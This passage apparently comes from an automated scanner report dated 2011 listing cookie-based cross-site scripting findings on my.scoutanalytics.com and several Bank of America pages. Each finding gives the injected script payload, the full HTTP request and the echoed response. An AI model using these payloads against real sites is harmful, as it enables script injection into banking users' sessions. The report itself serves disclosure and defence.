xp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1309224217%2E202%2Cwait%2D%3E10000%2C', "ar_s_p97126803": '1->130922623519826<script>alert(1)</script>41cc46641b7', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&', "ar_p84552060": 'exp=8&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28
...[SNIP]...

1.441. https://my.scoutanalytics.com/ptmrg/authenticate.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.scoutanalytics.com
Path:   /ptmrg/authenticate.aspx

Issue detail

The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56dea'-alert(1)-'e8e3a5b0207 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptmrg/authenticate.aspx HTTP/1.1
Host: my.scoutanalytics.com
Connection: keep-alive
Referer: https://my.scoutanalytics.com/DemandDashboard/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lz2lakoqp3wumiuuir4ic3lk56dea'-alert(1)-'e8e3a5b0207

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: NRV2
Date: Tue, 28 Jun 2011 01:31:06 GMT
Content-Length: 5010


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>

</
...[SNIP]...
0.9,text/plain;q=0.8,image/png,*/*;q=0.5|Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.3|Accept-Encoding=gzip,deflate,sdch|Accept-Language=en-US,en;q=0.8|Cookie=ASP.NET_SessionId=lz2lakoqp3wumiuuir4ic3lk56dea'-alert(1)-'e8e3a5b0207|Host=my.scoutanalytics.com|Referer=https://my.scoutanalytics.com/DemandDashboard/Login.aspx;');$AOC.addEvent(window, "load", $AOB.asyncPopulateClientBrowserData);//]]>
...[SNIP]...

1.442. https://onlineeast2.bankofamerica.com/cgi-bin/ias/0/E/EnrollEntryPoint [BOA_0020 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineeast2.bankofamerica.com
Path:   /cgi-bin/ias/0/E/EnrollEntryPoint

Issue detail

The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf1e4'%3balert(1)//4198d2809cf was submitted in the BOA_0020 cookie. This input was echoed as bf1e4';alert(1)//4198d2809cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/ias/0/E/EnrollEntryPoint?stateCode=MA&locale=en_US HTTP/1.1
Host: onlineeast2.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; BOA_COM_BT_ELIGIBLE=No; session_start_time=1309296687564; TCID=0007b046-77e2-485a-acb6-a45400000014; NSC_CbolPgBnfsjdb=445b32097852; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=bf1e4'%3balert(1)//4198d2809cf; throttle_value=31

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 11:53:02 GMT
Content-type: text/html
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-US
Set-cookie: JSESSIONID=0000ncsc-NRzTONp-jPy5JOp-0l:15foq4m2m; Path=/
Set-cookie: SessionID=ncsc-NRzTONp-jPy5JOp-0l; Path=/cgi-bin/ias; Secure
Set-cookie: SessionID=ncsc-NRzTONp-jPy5JOp-0l; Secure
Set-cookie: SERVERID=1309348382808_26288_95; Path=/; Domain=.bankofamerica.com
Set-cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com; Secure
Cache-control: no-store, no-cache=set-cookie
Content-Length: 56721


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">

<head>
<title>Bank of America | Online Banking | Enroll | Select your State & Account type</title>
<meta htt
...[SNIP]...
<!--
cmCreateApplicationTags (null, 'OLB Enrollment', '100', 'Enrollment Start Page', false, false, null, false, 'OLB_Enrollment', true, false, false, 'MA', null,'bf1e4';alert(1)//4198d2809cf',null, null, null, null,null,null,false, null, null);
//-->
...[SNIP]...

1.443. http://www.bankofamerica.com/cferror.cgi [state cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /cferror.cgi

Issue detail

The value of the state cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9e3a"><script>alert(1)</script>820ec8d8a75 was submitted in the state cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

POST /cferror.cgi HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/surveys/popup_visit.cfm
Content-Length: 440
Cache-Control: max-age=0
Origin: http://www.bankofamerica.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; CFID=139695610; CFTOKEN=53028ef%2D0000d77b%2D45df%2D1e0a%2Db202%2D839b8e390000; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; BOA_COM_BT_ELIGIBLE=No; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; GEOSERVER=3; appSession=WEAS; TLTSID=DC94A6B4A24A10A23E60D01283232BFC; TLTUID=DC94A6B4A24A10A23E60D01283232BFC; SERVERID=1309348382808_26288_95; CMAVID=70121306499602161810121; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=bf1e4'%3balert(1)//XSS%20in%20onlineeast; WAOR=1717870507.281.0000; BOFA_LOCALE_COOKIE=en-US; TCID=0007b046-77e2-485a-acb6-a45400000014; state=MAd9e3a"><script>alert(1)</script>820ec8d8a75; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; BIGipServerngen-www.80=3114710699.20480.0000

URL=http%3A%2F%2Fwww.bankofamerica.com%2Fsurveys%2Fpopup_visit.cfm&DateTime=Wed+Jun+29+14%3A08%3A53+2011&Template=%2Fwww%2Fbankofamerica%2Fdata%2Fsurveys%2Fpopup_visit.cfm&HTTPRefer=&RemoteAddress=171
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 14:10:07 GMT
Content-type: text/html
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Content-Length: 13295

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Description" content="Page
...[SNIP]...
<a href="http://www.bankofamerica.com/contact/?state=MAd9e3a"><script>alert(1)</script>820ec8d8a75">
...[SNIP]...

1.444. http://www.bankofamerica.com/findit/error.cgi [state cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /findit/error.cgi

Issue detail

The value of the state cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c174"><script>alert(1)</script>3d0d962e8a8 was submitted in the state cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

POST /findit/error.cgi HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/surveys12dd0%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ea01f5a16cdc/bridge/surveybridge.cfm?surveynumber=9
Content-Length: 184
Cache-Control: max-age=0
Origin: http://www.bankofamerica.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; BOFA_LOCALE_COOKIE=en-US; BIGipServerngen-www.80=916895403.20480.0000; TCID=0007b046-77e2-485a-acb6-a45400000014; session_start_time=1309296076997; CFID=139695610; CFTOKEN=53028ef%2D0000d77b%2D45df%2D1e0a%2Db202%2D839b8e390000; GEOSERVER=1; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; state=MA2c174"><script>alert(1)</script>3d0d962e8a8; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852

URL=http%3A%2F%2Fwww.bankofamerica.com%2Fsurveys12dd0%2522%253E%253Cscript%253Ealert%28document.location%29%253C%2Fscript%253Ea01f5a16cdc%2Fbridge%2Fsurveybridge.cfm%3Fsurveynumber%3D9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 28 Jun 2011 21:22:31 GMT
Content-type: text/html
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Content-Length: 13458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Description" content="Plea
...[SNIP]...
<a href="http://www.bankofamerica.com/contact/?state=MA2c174"><script>alert(1)</script>3d0d962e8a8">
...[SNIP]...

1.445. http://www.bankofamerica.com/surveys/flyout/HM_Arrays.js [state cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /surveys/flyout/HM_Arrays.js

Issue detail

The value of the state cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7ce2"><script>alert(1)</script>5b0928e6a91 was submitted in the state cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /surveys/flyout/HM_Arrays.js HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/surveys/popup_visit.cfm?survey_url=http://bankofamerica.researchhq.com/onlinebanking/index.php?cust=LOCP&survey_name=CTS%20Survey%20for%20ATM%20BC%20Locator%20II&surveynumber=9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; BOFA_LOCALE_COOKIE=en-US; cmRS=t3=1309270224924&pi=homepage%3AContent%3APersonal%3Bhome_personal; BIGipServerngen-www.80=916895403.20480.0000; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296076997; CFID=139695610; CFTOKEN=53028ef%2D0000d77b%2D45df%2D1e0a%2Db202%2D839b8e390000; GEOSERVER=1; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; state=MAe7ce2"><script>alert(1)</script>5b0928e6a91; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 28 Jun 2011 21:22:00 GMT
Content-type: text/html
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Content-Length: 13458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Description" content="Plea
...[SNIP]...
<a href="http://www.bankofamerica.com/contact/?state=MAe7ce2"><script>alert(1)</script>5b0928e6a91">
...[SNIP]...

1.446. http://www.bankofamerica.com/weblinking/flyout/HM_Arrays.js [state cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /weblinking/flyout/HM_Arrays.js

Issue detail

The value of the state cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec682"><script>alert(1)</script>bc9df5a28f2 was submitted in the state cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /weblinking/flyout/HM_Arrays.js HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; CFID=139695610; CFTOKEN=53028ef%2D0000d77b%2D45df%2D1e0a%2Db202%2D839b8e390000; GEOSERVER=1; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; CMAVID=70121306499602161810121; BOA_COM_BT_ELIGIBLE=No; session_start_time=1309296687564; TCID=0007b046-77e2-485a-acb6-a45400000014; NSC_CbolPgBnfsjdb=445b32097852; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; throttle_value=31; cmRS=&t1=1309348337083&t2=1309348343762&t3=1309348345857&lti=1309348345857&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSelectedId%3A1%3BfrmSignIn%3A2%3BUNDEFINED%3A3%3BstateSelectForm%3A4%3BfrmLocator%3A5%3BotherServices%3A6%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394&ul=https%3A//www.bankofamerica.com/&rf=http%3A//learn.bankofamerica.com/articles/managing-credit/reducing-the-cost-of-credit.html; BOFA_LOCALE_COOKIE=en-US; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=531019435.20480.0000; INTL_LANG=en_US; state=MAec682"><script>alert(1)</script>bc9df5a28f2; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 11:52:58 GMT
Content-type: text/html
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Content-Length: 13458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Description" content="Plea
...[SNIP]...
<a href="http://www.bankofamerica.com/contact/?state=MAec682"><script>alert(1)</script>bc9df5a28f2">
...[SNIP]...

1.447. http://www.bankofamerica.com/www/global/mvc_objects/images/1pixel_clear.gif [state cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /www/global/mvc_objects/images/1pixel_clear.gif

Issue detail

The value of the state cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e90dc"><script>alert(1)</script>89153cb12e0 was submitted in the state cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /www/global/mvc_objects/images/1pixel_clear.gif HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; BOFA_LOCALE_COOKIE=en-US; BIGipServerngen-www.80=916895403.20480.0000; TCID=0007b046-77e2-485a-acb6-a45400000014; session_start_time=1309296076997; CFID=139695610; CFTOKEN=53028ef%2D0000d77b%2D45df%2D1e0a%2Db202%2D839b8e390000; GEOSERVER=1; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; state=MAe90dc"><script>alert(1)</script>89153cb12e0; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 28 Jun 2011 21:22:34 GMT
Content-type: text/html
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Content-Length: 13458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Description" content="Plea
...[SNIP]...
<a href="http://www.bankofamerica.com/contact/?state=MAe90dc"><script>alert(1)</script>89153cb12e0">
...[SNIP]...

Report generated by XSS.CX at Tue Oct 18 07:35:50 CDT 2011.